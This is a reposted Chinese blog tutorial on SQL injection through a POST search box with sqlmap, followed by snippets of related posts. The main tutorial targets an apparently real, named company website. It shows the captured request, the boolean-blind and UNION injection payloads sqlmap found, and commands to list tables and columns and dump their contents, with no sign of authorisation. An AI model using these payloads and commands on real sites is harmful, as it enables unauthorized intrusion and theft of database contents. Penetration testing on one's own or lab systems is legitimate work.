sqlmap post搜索框的注入

最新推荐文章于 2024-11-11 16:04:46 发布
转载 最新推荐文章于 2024-11-11 16:04:46 发布 · 628 阅读 · 2 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/bzdmz/p/11107420.html
文章标签:

#操作系统

本文详细介绍了如何使用SQLMap进行POST类型的SQL注入攻击,包括抓包、构造注入语句、猜解表名、字段名及数据内容的全过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

post注入框的注入原理 大家可以自己百度一下哦!

要进行post注入我们首先要抓包 。。

用burpsuite或fildder

打开浏览器,设置代理,如代理8080端口

好了 随便输入一个1字 burpsuite已经抓到包了

key=1&x=23&y=4

 

然后我们启动sqlmap 构造一下(直接在命令行输入) sqlmap -u http://****.cn/product.asp --data "key=1&x=23&y=4"
Place: POST
Parameter: key
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: key=1%' AND 1393=1393 AND '%'='&x=24&y=9

Type: UNION query
Title: Generic UNION query (NULL) - 12 columns
Payload: key=-3532%' UNION ALL SELECT NULL,NULL,CHR(113)&CHR(104)&CHR(101)&CHR(110)&CHR(113)&CHR(103)&CHR(109)&CHR(84)&CHR(80)&CHR(98)&CHR(100)&CHR(74)&CHR(105)&CHR(102)&CHR(102)&CHR(113)&CHR(105)&CHR(114)&CHR(108)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16&x=24&y=9
---
[23:58:56] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft Access
[23:58:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.zjyingsong.com'
Place: POST


嗯 post型注入 然后我们就可以猜解了

sqlmap -u http://www.zjyingsong.com/product.asp --data "key=1&x=23&y=4" --tables //猜解表段

 

 sqlmap -u http://www.zjyingsong.com/product.asp --data "key=1&x=23&y=4" --columns -T 表段 //猜解字段

 

sqlmap -u http://www.zjyingsong.com/product.asp --data "key=1&x=23&y=4" --dump C "内容,内容," -T 刚才的表段 //猜解内容

 

转载于:https://www.cnblogs.com/bzdmz/p/11107420.html

利用sqlmap进行POST注入
ChuMeng1999的博客
01-19 1万+
目录预备知识了解SqlmapPOST注入形成的原因实验目的实验环境实验步骤一使用sqlmap进行POST注入实验步骤二 预备知识 了解Sqlmap sqlmap是一款开源、功能强大的自动化SQL注入工具,支持Access,MySQL,Oracle,SQL Server,DB2等多种数据库。支持get,post,cookie注入,支持基于布尔的盲注,基于时间的盲注,错误回显注入,联合查询注入,堆查询注入等。 POST注入形成的原因 POST注入也属于SQL注入,所以究其原因还是由于参数没有过滤导致的。源码如下
mysql 登录框注入_sqlmap之(六)----POST登陆框注入实战
weixin_35934037的博客
02-18 883
利用sqlmap进行POST注入,常见的有三种方法:注入方式一:1.用Burp抓包,然后保存抓取到的内容。例如:保存为post.txt,然后把它放至某个目录下2.列数据库:sqlmap.py-r"c:\Users\fendo\Desktop\post.txt"-pn--dbs注:-r表示加载一个文件,-p指定参数其中出现了三次提示:it looks like the back-end D...
sqlmappost注入
Galaxy_fan的博客
08-22 713
数据库 python sqlmap.py -r D:\GXY\python\sqlmap\test.txt --dbs 表 python sqlmap.py -r D:\GXY\python\sqlmap\test.txt --tables 数据 (users:表名) python sqlmap.py -r D:\GXY\python\sqlmap\test.txt -T users ...
sqlmap post注入
zhaozhanyong的专栏
11-19 6157
0x00 常用的 注入点:http://tetasp.vulnweb.com/Login.asp 几种注入方式: sqlmap -r search-test.txt -p tfUPass 其中search-test.txt的内容为以下所抓的post包 0x01 常参数的 sqlmap -r search-test.txt -p tfUPss 0x02 常参数的 sql
sqlmappost注入
墨渊的博客
09-29 251
调为low级 点击cope to file 把数据数据请求保存到txt -r 使用文件要先使用文件的路径 -r表示加载一个文件 --batch 表示自动输入参数 --dbs表示数据库 sqlmap -r 22.txt --batch --dbs -D 表示选择数据库 --tables表示数据库 sqlmap -r 22.txt --batch -D dvwa --tables -D -T 指定数据库查看的表 ----columns查看表的字段 –dump进行解密 ...
Sqlmap -- POST注入
Web安全工具库
07-07 3392
想归想,难过归难过,若你岁岁平安,我可生生不见。。。 ---- 网易云热评 一、检测是否存在注入 1、通过BurpSuite抓包获取提交的数据 2、sqlmap -u "http://192.168.139.129/pikachu/vul/sqli/sqli_id.php" --data "id=1&submit=%E6%9F%A5%E8%AF%A2" --data指定提交的数据 运行结果:id值存在注入,可能是布尔盲注、报错注入、时间盲注、联合注入 [14:37:09]...
sql 注入的类型之 post 基于错误的注入(sqllib靶场less-11-12)(通过burpusite分析)
weixin_74182283的博客
03-30 1501
post注入和get注入一样,都是基于数据库没有对语句进行足够多的过滤,导致用户可以直接在url上执行sql语句。这两基本上没区别,但是基于post注入在真实情况下会比get的多得多,最典型的post注入就是万能密码。
【安全测试】sqlmap工具(sql注入)学习
最新发布
春天的波菜
11-11 1164
sqimap是一个开源的渗透测试工具,它可以自动化检测和利用SQL注入缺陷以及接管数据库服务器的过程。它有一个强大的检测引擎,许多适合于终极渗透测试的小众特性和广泛的开关,从数据库指纹、从数据库获取数据到访问底层文件系统和通过带外连接在操作系统上执行命令。官方网址:http://sqlmap.org/本文是用于学习,请自觉维护网络安全。
SQL注入漏洞之sqlmap自动注入
XZZbh的博客
09-19 722
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档。
SQLMAP 注入教程
General的 优快云 博客
11-15 5593
SQLMAP SQLMAP是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,IBM DB2,SQLite,Firebird,Sybase,SAP MaxDB,Informix,HSQLDB和H2数据库管理系统。 当给SQLMAP这么一个url的时候,它会: 判断可注入的参数 判断可以用那种SQL 注入技术来注入 识别出哪种数据
sqlmapPOST注入
Seizerz的博客
10-22 803
测试过程中,遇到POST注入该怎么判断呢,sqlmap前来报到。 有两种方法: 1、sqlmap -u "url" --forms --batch--dbs 2、burpsuite抓取请求包数据,保存成文件,利用sqlmap自动读取 先开启burpsuite监听,然后输入数据, 将监听到的包数据保存下来, sqlmap -r bao --batch自动执...
Sqlmap————5、POST注入
Fly_鹏程万里
05-04 1371
具体流程:(1)浏览器打开目标地址http:// www.xxx.com /Login.asp(2)配置burp代理(127.0.0.1:8080)以拦截请求(3)点击login表单的submit按钮(4)这时候Burp会拦截到了我们的登录POST请求(5)把这个post请求复制为txt, 我这命名为test.txt 然后把它放至sqlmap目录下(6)运行sqlmap并执行如下命令:1、列数据库...
DVWA——使用sqlmap工具post注入
@一只躺平的猪@的博客
07-09 4457
使用phpstudy搭建的DVWA靶场-暴力破解(low级别) sqlmap 可以看到密码解密为root 也可以用在线的md5对密文进行解密 https://www.cmd5.com/ 本章介绍了sqlmap关于post注入的使用步骤以及攻击的相关语句。
利用sqlmap进行post注入(实操)
peanut5036的博客
12-23 4191
SQL注入攻击指的是通过特殊的输入作为参数拆入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句中进而执行攻击者所要的操作,起主要原因是程序没有细致地过滤用户输入的数据,致使非法数据入侵系统。 任何一个用户可以输入的位置都可能是注入点。比如url中,以及http报文中,POST传递的参数
sqlmap post 注入方法
weixin_59938810的博客
01-17 472
利用sqlmap进行POST注入 - 远山冰雪 - 博客园
sqlmap使用之-post注入、head注入(ua、cookie、referer)
weixin_51520483的博客
07-11 1471
bp抓包获取post数据将数据保存到post.txt文件加上-r指定数据文件。
sqlmapPOST注入与cookie注入
热门推荐
ve9etable的博客
10-28 3万+
零、POST注入 POST和GET POST和GET是HTTP的两种请求方法,并且是两种最常用的请求方法 GET一般指向指定资源请求数据,而POST则是要向指定资源提交需要被处理的数据 查询字符串是在 GET 请求的 URL 中发送的,类似于这样 而POST查询字符串是在 请求的 HTTP 消息主体中发送的,类似于这样 ...
利用sqlmap进行post注入学习笔记
weixin_52034407的博客
03-19 3211
使用sqlmap进行post注入学习笔记
深入解析SQL注入漏洞及SQLmap工具应用
6. SQLmap工具的使用:SQLmap的使用主要包括配置代理、设置目标URL、设置代理服务器、设置随机代理服务器、设置代理认证、设置用户代理字符串、设置cookie、设置HTTP头部、设置POST数据、设置数据库名、设置登录名、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值